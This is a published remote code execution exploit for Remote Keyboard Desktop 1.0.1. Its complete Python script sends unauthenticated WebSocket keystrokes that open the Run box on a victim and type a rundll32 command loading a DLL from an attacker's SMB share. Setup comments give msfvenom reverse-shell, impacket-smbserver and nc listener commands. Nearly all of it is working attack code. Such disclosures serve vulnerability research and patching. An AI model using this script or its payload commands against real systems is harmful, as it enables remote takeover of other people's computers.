
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045
#
# How it works: the app listens for WebSocket "keyboard_event" frames on TCP/8080.
# This script presents no token or credential in the handshake, so (as far as the
# script shows) any host that can reach the port can inject keystrokes into the
# logged-on user's session. The injected sequence is Win+R, a UNC path to an
# attacker-hosted payload, Enter. Consequences for the operator: the victim needs
# an interactive, unlocked desktop, and outbound SMB (TCP/445) to the attacker
# host; an unencoded msfvenom payload may well be stopped by AV on a patched host
# (the page does not say how that was handled).
#
# Start Remote Keyboard Desktop on the victim's Windows machine.
#
# Preparing (on the attacker host). The script's `lhost` (192.168.8.101) is the
# host serving the SMB share, and `payload` is the filename on that share; the
# values below must match what you actually use.
#
# 1. Generate the payload (dll/exe). LHOST must be the address the reverse
#    shell calls back to, i.e. the host running nc in step 3 (it is NOT the
#    victim's address, which is what `target` in the script holds):
#    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8080 -f dll > shell2.dll
# 2. Start the SMB server in the directory holding the payload:
#    impacket-smbserver SHARE . -smb2support
# 3. Start the handler: nc -lnvp 8080
# 4. python exploit.py
#
#####
#!/usr/bin/env python3
import websocket
import json
import time
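target = "192.168.8.105"  # victim running Remote Keyboard Desktop (its WebSocket listener)
lhost = "192.168.8.101"   # attacker host serving the SMB share that holds the payload

# Plain ws:// on 8080. Nothing below adds a token or credential to the
# handshake, so the listener appears to accept keyboard events from any
# client that can reach the port. NOTE(review): inferred from this script
# only — confirm against the app itself.
WS_URL = f"ws://{target}:8080/"

payload = "shell2.dll"  # payload dll/exe filename on the SMB share (must match what msfvenom wrote)

debug = False  # True: enable websocket tracing and echo every message/error/close

# Mimic the Flutter/Dart client so the listener treats us like the official app.
HEADER_LIST = [
    "User-Agent: Dart/3.7 (dart:io)",
    f"Origin: http://{target}:8080",
    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits",
]

# Command typed into the Win+R "Run" box on the victim. Both variants fetch the
# payload over SMB from the attacker's share, so the victim needs outbound
# SMB (TCP/445) to lhost; egress filtering breaks this stage.
#
# exe based: run the payload via cmd directly
# SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}"
#
# dll based: rundll32 loads the DLL from the UNC path. "ExportedFunc" is a
# placeholder — presumably the msfvenom DLL fires from DllMain on load, so
# the export name does not need to exist (verify for your payload).
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc"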
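# Characters the app does not accept under their literal name, mapped to
# (key name, needs shift). Letters and digits are handled in send_text.
special_mapping = {
    ' ': ("SPACE", False),
    '/': ("NUMPAD_DIVIDE", False),
    '\\': ("\\", False),
    '.': ("NUMPAD_DECIMAL", False),
    ',': (",", False),
}


def send_key_event(ws, key, key_down):
    """Send one keyboard_event frame (a key press or release) to the app.

    Args:
        ws: connected WebSocket-like object exposing ``send(str)``.
        key: key name the app understands ("A", "1", "SPACE", "SHIFT", ...).
        key_down: True for press, False for release.
    """
    event = {
        "command": "keyboard_event",
        "data": {"key": key, "keyDown": key_down, "capsLock": False},
    }
    ws.send(json.dumps(event))


def _map_char(ch):
    """Return ``(key_name, need_shift)`` for one character of typed text.

    Raises:
        ValueError: if ``ch`` has no key mapping.
    """
    if ch in special_mapping:
        return special_mapping[ch]
    if ch.isalpha():
        # NOTE(review): isalpha()/upper() also accept non-ASCII letters, and
        # the resulting key name may not be one the app knows — unverified.
        return ch.upper(), ch.isupper()
    if ch.isdigit():
        return ch, False
    raise ValueError(f"No key mapping for character: {ch!r}")


def send_text(ws, text, delay=0.05):
    """Type ``text`` on the victim, one press/release pair per character.

    SHIFT is pressed before the first character that needs it, held across a
    run of such characters, released before the first one that does not, and
    always released at the end.

    Args:
        ws: connected WebSocket-like object exposing ``send(str)``.
        text: characters to type; letters, digits and ``special_mapping`` keys.
        delay: seconds to sleep after each character.

    Raises:
        ValueError: if any character has no key mapping. Raised before any
            key event is sent.
    """
    # Map everything first so an unmappable character fails before anything
    # goes over the wire — otherwise a ValueError raised mid-string could
    # leave SHIFT held down on the victim's desktop.
    keys = [_map_char(ch) for ch in text]

    shift_pressed = False
    for key_name, need_shift in keys:
        if need_shift != shift_pressed:
            send_key_event(ws, "SHIFT", need_shift)
            shift_pressed = need_shift
        send_key_event(ws, key_name, True)
        send_key_event(ws, key_name, False)
        time.sleep(delay)

    if shift_pressed:
        send_key_event(ws, "SHIFT", False)


def send_key(ws, keys, delay=0.05):
    """Press ``keys`` in order (a chord such as Win+R), then release them in reverse.

    Args:
        ws: connected WebSocket-like object exposing ``send(str)``.
        keys: key names to hold together.
        delay: seconds to sleep after each press (no sleep between releases).
    """
    for key in keys:
        send_key_event(ws, key, True)
        time.sleep(delay)
    for key in reversed(keys):
        send_key_event(ws, key, False)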
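def on_open(ws):
    """Drive the attack as soon as the WebSocket handshake completes.

    Sends Win+R, types SMB_PATH into the Run box, presses Enter, then closes
    the connection. Presumably the victim needs an interactive, unlocked
    desktop for the injected keystrokes to land; nothing here checks that.

    Args:
        ws: the connected websocket.WebSocketApp instance.
    """
    print("Let's start!")

    send_key(ws, ["LEFT_WINDOWS", "R"])
    time.sleep(0.5)  # presumably lets the Run dialog appear and take focus

    send_text(ws, SMB_PATH)
    send_key(ws, ["RETURN"])
    print("Executing...")
    time.sleep(1.2)  # let the command start before dropping the connection

    print("Check your listener!")
    if debug:
        # Single string literal; the published copy had it split across lines.
        print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m")

    ws.close()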
def on_message(ws, message):
    """Echo frames the app sends back; only active when ``debug`` is True."""
    if not debug:
        return
    print("[=] Received:", message)
def on_error(ws, error):
    """Report a WebSocket error; only active when ``debug`` is True."""
    if not debug:
        return
    print("[!] Error:", error)
def on_close(ws, code, reason):
    """Report the close status and reason; only active when ``debug`` is True."""
    if not debug:
        return
    print(f"[x] Closed: {code} - {reason}")
if __name__ == "__main__":
    # Verbose handshake/frame dump only when debugging.
    websocket.enableTrace(debug)
    callbacks = dict(
        on_open=on_open,
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
    )
    ws = websocket.WebSocketApp(WS_URL, header=HEADER_LIST, **callbacks)
    # on_open does all the work and closes the socket when it is done.
    ws.run_forever()